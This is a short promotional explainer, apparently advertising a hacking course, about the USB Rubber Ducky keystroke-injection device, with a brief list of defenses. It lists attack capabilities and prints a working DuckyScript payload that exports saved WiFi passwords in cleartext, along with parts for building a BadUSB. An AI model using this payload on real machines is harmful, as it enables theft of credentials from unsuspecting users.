USB Rubber Ducky — The 3-Second Hack
It looks like a USB flash drive. But when plugged in, it acts as a keyboard that types at 1000+ WPM, executing pre-programmed attacks.
How It Works
- Plug the Rubber Ducky into any computer
- Computer detects it as a keyboard (trusted device)
- Pre-programmed script executes in 3-5 seconds
- Payload delivered before victim notices anything
What Can Rubber Ducky Do?
- 🔴 Open reverse shell — attacker gets full remote access
- 🔴 Steal all saved WiFi passwords
- 🔴 Dump browser credentials
- 🔴 Install keylogger
- 🔴 Exfiltrate files to cloud
- 🔴 Create admin backdoor account
Example Script (DuckyScript)
REM Steal WiFi Passwords
DELAY 1000
GUI r
DELAY 500
STRING cmd /k
ENTER
DELAY 500
STRING netsh wlan show profiles
ENTER
DELAY 2000
STRING netsh wlan export profile key=clear folder=C:\temp
ENTER
Build Your Own BadUSB (₹500)
- DigiSpark ATtiny85: ₹200-500 on Amazon
- Arduino Leonardo: ₹800 with USB HID support
- Raspberry Pi Pico: ₹400 with CircuitPython
Defense
- 🔒 Never plug unknown USB devices
- 🔒 Use USB port blockers
- 🔒 Group Policy to disable new USB keyboards
- 🔒 USB security software
🔥 Learn hardware hacking at ONLY4YOU →